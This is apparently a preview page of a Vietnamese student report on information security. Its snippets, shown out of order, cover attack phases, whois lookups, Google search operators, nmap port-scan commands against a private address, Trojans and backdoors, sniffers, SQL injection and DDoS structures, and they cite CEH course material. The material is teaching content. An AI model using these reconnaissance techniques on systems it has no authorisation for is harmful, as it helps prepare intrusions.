vấn đề sau Hiểu an ninh thông tin, cac khái niệm ngành an ninh thông tin Phân loại dạng công mà hacker công vào hệ thống Các giai đoạn công hệ thống hacker Chương 2, vào tìm hiểu kỹ thuật, công cụ mà hacker thường dùng Chương 3, lần lại chương chương tìm hiểu sâu số kỹ thuật mà trình bày chương Kỹ thuật thu thập thông tin mục tiêu Kỹ thuật sử dụng Trojan Backdoor Tấn công theo kiểu SQL Injection Tấn công từ chối dịch vụ theo kiểu DoS hay DDoS 35 Tài liệu tham khảo [1] Trần Minh văn, An toàn bảo mật thông tin, nhà xuất ĐHBK [2] Tài liệu đào tạo hacker mũ trắng CEH v9 v7 [3] Wikipedia.org [4] securitydaily.net 36 [...]... nhiều thông tin về mục tiêu của mình như chủ sở hữu tên miền trang web, địa chỉ ip, trang quản trị, thông tin cá nhân người quản trị, máy chủ phân giải tên miền, các cổng dịch vụ đang mở hay đóng trên một host 3.1.1 Quy trình thu thập thông tin Để tiến hành thu thập thông tin một cách khoa học, có hiệu quả chúng ta cần thực hiện như sau; 1 tìm kiếm thông tin từ các nguồn thông tin như các thông tin. .. (R11-LROR) Status:OK Registrant ID:tuTv2ItRZBMNd4lA Registrant Name: John Smith Registrant Organization:International Council of E-Commerce Consultants Registrant Street1:67 Wall Street, 22nd Floor 14 An ninh thông tin CHƯƠNG 3 ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Registrant City:New York Registrant State/Province:NY Registrant Postal Code:10005-3198 Registrant Country:US Registrant Phone:+1.2127098253 Information-Gathering... cách thu thập thông tin hiệu quả mà an toàn nhất, chính là thông qua các công cụ tìm kiếm Nếu biết sử dụng các từ khóa một cách 13 An ninh thông tin CHƯƠNG 3 ĐI SÂU VÀO MỘT SỐ KỸ THUẬT thông minh, chúng ta sẽ có thể dò được những thông tin mật, hay với phương pháp tìm kiếm bình thường ta không thể tìm ra, đã có cả một cuốn sách google hacking nói về cách tìm kiếm thông tin nhạy cảm trên công cụ tìm kiếm... tìm các tài liệu liên quan tới hacking ta có thể gõ tìm kiếm như sau: filetype: pdf hacking Một loạt các kết quả liên quan đến từ khóa hacking đã ra Chúng ta có thể tìm kiếm các nguồn thông tin từ - Open source : Các nguồn tài nguyên mở là những dữ liệu công khai như trang vàng doanh nghiệp, danh bạ điện thọai - Whois : Cơ sở dữ liệu về chủ sở hữu tên miền - Nslookup : Thông tin về máy chủ phân giải... sau đó và chỉ 10 An ninh thông tin CHƯƠNG 2 TỔNG QUAN VỀ CÁC KỸ THUẬT lây lan sang các máy tính khác khi người dùng sao chép hay di chuyển tập tin bằng usb, Trong khi đó worm có thể tìm ra các điểm yếu của các máy tính khác trên mạng để lây nhiễm 2.4 Sniffer Là một kỹ thuật dùng để nghe lén thông tin của mục tiêu Trong giới bảo mật thì sniffer là các công cụ có khả năng bắt các gói tin trong quá trình... Trojan thường được cài đặt vào máy tính nạn nhân thông qua các hình thức như tặng quà, trúng thưởng, Nếu bất cẩn bạn có thể nhiễm Trojan, khi bại nhiễm các các tín hiệu bàn phím, hay các hành động trên máy tính của nạn nhân sẽ được gửi về hộp thư của hacker Một số các Trojan phổ biến 18 An ninh thông tin 3.2.2 CHƯƠNG 3 ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Overt Và Covert Channel Overt channel Là cơ truyền thông. .. hay nhiều Handler Thông thường kẻ tấn công sẽ đặt Handler software trên một Router hay một 28 An ninh thông tin CHƯƠNG 3 ĐI SÂU VÀO MỘT SỐ KỸ THUẬT server có lưu thông nhiều Việc làm này cho các giao tiếp giữa Client, handler và Agent khó phát hiện Các giao tiếp này thông thường xảy ra trên các protocol TCP, UDP hay ICMP Mô hình IRC – Based IRC – Based network đóng vai trò như như là Agent–Handler network... 192.168.2.121 16 An ninh thông tin CHƯƠNG 3 ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Quét một port cụ thể nào đó: nmap -p 3389 192.168.2.121 Quét kết nối TCP, thực hành quét bắt tay 3 bước: nmap -sT 192.168.2.121 17 An ninh thông tin 3.2 3.2.1 CHƯƠNG 3 ĐI SÂU VÀO MỘT SỐ KỸ THUẬT Trojan Và Backdoor Phân biệt Trojan và Backdoor Khái niệm cơ bản nhất đã nêu ở chương trước, tiếp theo chúng ta sẽ đi sâu vào Trojan, Backdoor... rút kinh nghiệm Kết luận Trên đây là toàn bộ nội dung về đề tài chúng ta đã tìm hiểu được những thứ cơ bản nhất về vấn đề an ninh thông tin Chương 1, chúng ta đã tìm hiểu các vấn đề cơ bản sau 1 Hiểu được thế nào là an ninh thông tin, cac khái niệm cơ bản trong ngành an ninh thông tin 2 Phân loại các dạng tấn công mà hacker tấn công vào một hệ thống 3 Các giai đoạn tấn công hệ thống của một hacker Chương... quan về các kỹ thuật Ở chương này chúng ta sẽ cùng nhau tìm hiều về các kỹ thuật, mà các hacker hay dùng để khai thác lỗ hổng của hệ thống, và đến chương 3 chúng ta sẽ đi sâu vào các kỹ thuật điển hình 2.1 Kỹ thuật thu thập thông tin Một cuộc tấn công, có hiệu quả hay không phụ thuộc lớn vào lượng thông tin mà thu thập được trước khi tấn cống Từ các lượng thông tin đó mà hacker có thể phân tích đánh

Ngày đăng: 10/11/2016, 20:15

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan